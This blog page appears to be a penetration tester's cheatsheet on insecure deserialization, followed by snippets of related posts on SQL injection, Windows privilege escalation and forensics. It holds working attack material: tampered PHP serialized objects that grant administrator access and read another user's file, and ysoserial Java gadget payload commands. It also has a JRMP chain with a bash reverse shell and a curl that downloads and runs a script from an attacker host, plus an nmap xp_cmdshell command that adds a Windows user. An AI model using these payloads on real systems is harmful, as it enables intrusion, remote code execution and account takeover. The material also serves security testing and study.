Skip to main content

Insecure Deserialization Cheatsheet

 Any class that implements the interface java.io.Serializable can be serialized and deserialized. If you have source code access, take note of any code that uses the readObject() method, which is used to read and deserialize data from an InputStream.

The native methods for PHP serialization are serialize() and unserialize(). If you have source code access, you should start by looking for unserialize().

Basic Serialization

- look for cookies with base64 encoded or some kind of searialzed

you can update the admin;b:0 to admin;B:1 --> which makes us admin

PHP - Exploiting Data Types
- Look for cookies and any other serialized values
- Update the user value or the username to any user
- if required update the access token, serialize it and try to access unauthorized data

Example
Update the data from 
O:4:"User":2:{s:8:"username";s:6:"wiener";s:12:"access_token";s:32:"msai659yp7cfu0magd7vm3siq9ls2cld";}
to
O:4:"User":2:{s:8:"username";s:13:"administrator";s:12:"access_token";i:0;}

- Always try to update the content in the serialized object 
Update the object from 
O:4:"User":3:{s:8:"username";s:5:"gregg";s:12:"access_token";s:32:"favhu4mwxv64b6mz5x6ga79wxs5k95op";s:11:"avatar_link";s:18:"users/gregg/avatar";
TO
O:4:"User":3:{s:8:"username";s:6:"wiener";s:12:"access_token";s:32:"zp46h5h7j8dbk07k04e57dgu67ayxsy7";s:11:"avatar_link";s:23:"/home/carlos/morale.txt";}
Magic Methods 

Magic methods are a special subset of methods that you do not have to explicitly invoke. Instead, they are invoked automatically whenever a particular event or scenario occurs

 __construct(), which is invoked whenever an object of the class is instantiated, similar to Python's __init__.

some languages have magic methods that are invoked automatically during the deserialization process. For example, PHP's unserialize() method looks for and invokes an object's __wakeup() magic method.

In Java deserialization, the same applies to the ObjectInputStream.readObject() method, which is used to read data from the initial byte stream and essentially acts like a constructor for "re-initializing" a serialized object. However, Serializable classes can also declare their own readObject() method as follows:

private void readObject(ObjectInputStream in) throws IOException, ClassNotFoundException
{
    // implementation
}
A readObject() method declared in exactly this way acts as a magic method that is invoked during deserialization. This allows the class to control the deserialization of its own fields more closely.

You should pay close attention to any classes that contain these types of magic methods. They allow you to pass data from a serialized object into the website's code before the object is fully deserialized. This is the starting point for creating more advanced exploits.


YSOSerial

#Requires Java 11 to run
sudo apt install openjdk-11-jdk
sudo update-alternatives --config java
java --version Download the latest package from https://github.com/frohoff/ysoserial/releases/latest/download/ysoserial-all.jar java -jar ysoserial-all.jar CommonsCollections4 "nc 10.10.10.10 8080" #Remove empty lines java -jar ysoserial-all.jar CommonsCollections4 "nc 10.10.10.10 8080" | base64 -w 0 > output.txt #Little bit of automation - generate all payloads at once java -jar ../ysoserial.jar >yso 2>&1 cat yso | tr -d ' ' | cut -d "@" -f 1 | sed '1,8d'> payloads.txt while read payloadname; do java -jar ../ysoserial.jar $payloadname "ping 10.10.10.10 -c 3" | base64 -w 0 > $payloadname; done < payloads.txt # Run TCP Dump to check if you are getting any response back sudo tcpdump -i tap0 icmp or better use Burp Extensions Java Serial Killer Java Deserialization Scanner
Exploiting Insecure Deserialization using JRMP

#Host a Reverse shell 
python -m http.server 8000

rev.sh 
bash -c 'exec bash -i &>/dev/tcp/ATTACKER/9001 <&1'

#Start a listner 
java -cp /usr/local/bin/ysoserial-all.jar ysoserial.exploit.JRMPListener 80 CommonsCollections3 "curl http://ATTACKER:8000/rev.sh -o /tmp/rev.sh; bash /tmp/rev.sh"

# Generate the payload and send it 
java -jar /usr/local/bin/ysoserial-all.jar JRMPClient ATTACKER:80 | base64 -w 0 > output.txt

#Start a new listner
java -cp /usr/local/bin/ysoserial-all.jar ysoserial.exploit.JRMPListener 82 CommonsCollections3 "bash /tmp/rev.sh"

# Generate the payload and send it 
java -jar /usr/local/bin/ysoserial-all.jar JRMPClient ATTACKER:81 | base64 -w 0 > output2.txt


Comments

Popular posts from this blog

SQL DB & SQL Injection Pentest Cheat Sheet

1) MSSQL Injection Cheat Sheet | pentestmonkey 2) xp_cmdshell | Red Team tales 3) PentesterMonkey SQL Injection Cheatsheet Use dbeaver for GUI Access 4) SQL Injection Explanation | Graceful Security Common Ports Microsoft SQL: 1433/TCP (default listener) 1434/UDP (browser service) 4022/TCP (service broker) 5022/TCP (AlwaysOn High Availability default) 135/TCP (Transaction SQL Debugger) 2383/TCP (Analysis Services) 2382/TCP (SQL Server Browser Service) 500,4500/UDP (IPSec) 137-138/UDP (NetBios / CIFS) 139/TCP (NetBios CIFS) 445/TCP (CIFS) Oracle SQL: 1521/TCP 1630/TCP 3938/HTTP MongoDB : 27017,27018,27019/TCP PostgreSQL: 8432/TCP MySQL: 3306/TCP SQL DB Enum with nmap: nmap -p 1433 —script ms-sql-info —script-args mssql.instance-port=1433 IP_ADDRESS nmap -Pn -n -sS —script=ms-sql-xp-cmdshell.nse IP_ADDRESS -p1433 —script-args mssql.username=sa,mssql.password=password,ms-sql-xp-cmdshell.cmd="net user bhanu bhanu123 /add" nmap -Pn -n -sS —script=ms-sql-xp-cmds

Windows Priv Escallation

1.     Windows Privilege Escalation Commands  _ new 2.     Transferring Files to Windows 3.    Priv Esc Commands 4.    Priv Esc Guide  5.    Payload All the Things --> great Coverage 6.    WinRM -- Windows Priv Esc    7. Newb Guide - Windows Pentest    8. Kerberos Attacks Explained     9. How to Attack Kerberos 101    Use PowerSploit/PrivEsc/Powerup.ps1 to find some potential info check for Non-windows processes in windows using netstat Step 1: Check net user and admin and user rights Step 2: Check if we have access of powershell if yes then run powerup.ps1,sherlock.ps1 and JAWS.ps1. Step 3: Try to get Meterpreter. Step 4: Load mimikatz ,try bypass UAC , check SAM SYSTEM etc. Step 5: check for weird programs and registry. Step 6: If the box is Domain Controller - Enum - Enum SMB Users/Ldap Users/ Blood Hound - GUI AD Enum & Kerberos Enum - Bruteforce   Atacking AD with LDAP & kerberos      Step 7: Got Creds - try psexec.py or crackm

Forensics & Crypto

Online Decoder --> https://2cyr.com/decode/ Encoding errors -->  https://ftfy.now.sh/ File Signatures List -->  Click here PCAP Analysis: -->  https://www.packettotal.com/ Online Cipher Decryptors: CyberChef  - Cipher Decoder   Crack Station-Hash Cracke r Decrypt Any Kind of Hash 1)  Cipher Statistics 2)  Index of Coincidence Calculator - Online IC Cryptanalysis Tool 3)  Tools List (Awesome and Fantastic Tools) Available on dCode 4)  Solve an Aristocrat or Patristocrat 5)  RSA attack tool (mainly for ctf) - retreive private key from weak public key and/or uncipher data 5-1)  RSA - Find PQ using N 6)  BertNase's Own Hide content in a Image made of blocks - npiet fun! 7)  Vigenere Solver - www.guballa.de 8)  Fernet (Decode) 9)  Unicode Text Steganography Encoders/Decoders 10)  All in ONE encoders and Decoders Tool 11) Cryptii - Decoder Image Forensics: 1)  Forensically, free online photo forensics tools - 29a.ch 2)  StegSolve to decryt data in